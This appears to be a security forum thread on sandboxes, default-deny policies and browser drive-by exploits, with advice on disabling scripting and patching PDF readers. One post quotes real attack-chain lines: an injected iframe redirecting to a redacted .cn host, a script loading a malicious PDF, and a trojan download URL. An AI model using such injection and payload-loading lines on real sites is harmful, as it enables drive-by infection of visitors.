What's the point of sandboxes?

OK, thanks for the explanation. It makes sense.

That is not clear: if there is default-deny at the gate, what does it matter whether you are running as Admin or LUA?

----
rich

 

I've seen one (old .wmf exploit) back a few years ago that did provide the user with a prompt even with Javascript/Java disabled. If the user clicked OK on that prompt they would have been infected as I did on my test box at the time with Opera v8.54. Proxomitron effectively blocked that prompt however. (God bless it)

 

Sorry Rich

It is a moving scale.

Most secure (prevent) is default deny. This can be implemented through SRP or running as admin and using an application like AE2. AE2 has a white and blacklist, even for programs residing in the user space (so independantly whether you run ADMIN/LUA), so it can be called a SMART SRP.

Restricting rights (you allow everything to execute, but allow them less or more access to critical resources) can be achieved by User Management (running as LUA) or with Programs like DW. With DefenseWall only untrusted programs and files run LUA independantly of whether you are Admin or LUA or where the program file/downloaded file is located. Like AE2 implements SRP accross user domains, DW implements LUA accross user domains.

Regards

 

One person I know runs as Admin with SRP and says SRP provides default-deny, as he's shown me in many tests of live exploits. So, I guess it's how the user feels he/she is protected.

I didn't realize AE2 has a blacklist. Can you explain?

thanks,

rich

 

If the user clicks OK, then it's not a drive-by exploit any more.

----
rich

 

I just remember with this infection, IE was a 'drive-by', but Firefox and Opera were both prompted. This was the only infection I ran across at the time that would give a prompt in Opera even with Javascript disabled. It startled me.

 

The wmf exploit used i-frame and not javascript.

This would genererate a prompt in Opera no matter the scripting setting. I just tested to be sure:

​

This brings me back to the original assertion that Opera (so far!) is immune from known drive-by attacks.

----
rich

 

Rich,

Sorry my fault, I thought they it had one.

 

Thank you for that Rmus. I've always turned off i-frames in Opera since v9.

Also, do you prefer AE2 over AE3?

 

Would a sandbox contain vulnerabilities in browsers, flash player, etc? Would one be vulnerable to something like "Gumblar" if no sandbox is used?

 

This depends on how you have scripting configured in your browser.

The analyses of gumblar and similar exploits show that the user is redirected from a website that has been compromised with malicious code, to one of the .cn sites.

Once on the .cn site, a script sets in motion the attack to serve up various exploits.

If the browser has scripting configured per site, then the script on the .cn page cannot execute. Here is an example of a current one still active. The injected code on the legitimate site has this command to send the user to the .cn site:

Code:

i frame src="http://xxxxxxxxxxx.cn/in.cgi?income56

That .cn page has a script to load a malicious PDF file:

Code:

document.write('< i frame src="cache/readme.pdf" 

If the browser has scripting and plugins enabled, the PDF file will load into the i-frame. The exploit code in this PDF file
does not work on my version of the Reader, so the PDF file just sits in the i-frame and does nothing.





With scripting disabled, a blank page displays because the script cannot execute, and no i-frame displays:



Nonetheless, it's wise to have in place something to catch the remote code execution of malware downloads
in case of accidents or new types of exploits.
In a PDF file that did work, the code attempted to download a trojan file:

Code:

http://XXXXXX.cn/load.php?id=4

----
rich

 

Would one be vulnerable with default settings? How do you configure scripting in Firefox? Would something like disabling Javascript or using NoScript stop these attacks?

Would an outbound firewall help in these case?
Thanks

 

Disabling Javascript prevents the drive-by PDF exploits from starting. I use Firefox mainly for testing, and I configure scripting in the Options:

​

This controls javascript globally. I'm not sure, but I think NoScript allows for per site configuring, like Opera does.

Yes, assuming you have not granted permission for the Acrobat Reader to connect out to the internet!

See here for stepping through a PDF exploit:

http://www.urs2.net/rsj/computing/tests/pdf

----
rich

 

What PDF readers would most current exploits work with? Is it just Adobe Reader, and if so what versions of Adobe? Thanks

 

Current exploits: None in Foxit or Adobe Acrobat if the user has the latest version/updates.

You can keep up with the exploits/updates here:

Foxit
http://www.foxitsoftware.com/pdf/reader/security.htm

Adobe Acrobat
http://www.adobe.com/support/security/?securityadvisoryproduct=#acrobatwin&Submit=Go

----
rich

 

No doubt the technology behind such programs is amazing, but I'm still trying to understand when it's best to use something like Sandboxie or KIS 2010's Safe Run. For example, I personally wouldn't sandbox this particular browsing session being on Wilders or checking the news at the BBC. However, I did use a sandbox to test out the site of a fraudulent security program recently though.

 

You can get hit by a drive-by-download even on a safe, respected site if it has been hacked. There have been several examples of this lately but I cannot remember any of the well known sites that were hit and unknowingly started infecting folks.

Acadia

 

I'm aware legitimate sites may fall foul of exploits/malware. I guess this is where other protection measures come into play; for example, I use Firefox with the NoScript addon bolted on.

I came across such a website recently that was compromised, and the KL script emulator picked it up. The link to the site was sent for further analysis, and detection was added to the next update for a trojan-clicker contained in the index file. The site was eventually cleaned up, and no longer was picked up by a number of AVs.

 

I guess a lot depends on you having the knowledge that if you always run in SB, certain security aspects shuold be handled. If you always do, then you always know. If you only do selectively, then you only know at certain points. Some peeps just like to know.

I do as you though, I don't place all my browsing in sandbox, only selectively.

Sul.

 

I'd like to ask a question, which hopefully some of you more knowledgeable might be able to answer.

I understand the point of sandboxing and, in particular, how Sandboxie is used, but from what I can see it creates a folder or folders where sandboxed material goes. In the case of Sandboxie, it's a single sandbox folder.

Why doesn't malware escape from that folder? I appreciate the point is to separate items from rest of system, but the folder looks like any other. So what's the difference from running things there and from the usual destinations? I mean if you use say Ccleaner to clear out the internet cache after a browsing session, that stuff has gone. Emptying the sandbox is doing the same thing?

 

Open c:\sandbox\box..

Execute anything. Text file, program, etc etc.

Even if you are using cmd or explorer, what you execute starts in SB. SB control (service) would have to be shut down before those files could be executed outside of SB. It is interesting too, sometimes you drag and drop out of a sandboxed directory (forced or c:\sandbox\box) and the item seems to inherit SB rights, so even though it is on your real desktop, you execute it and it still starts in SB.

It seems from what I have tried, there is not a way for that c:\sandbox directory to be ran in normal OS. But then, maybe others have a method.

Sul.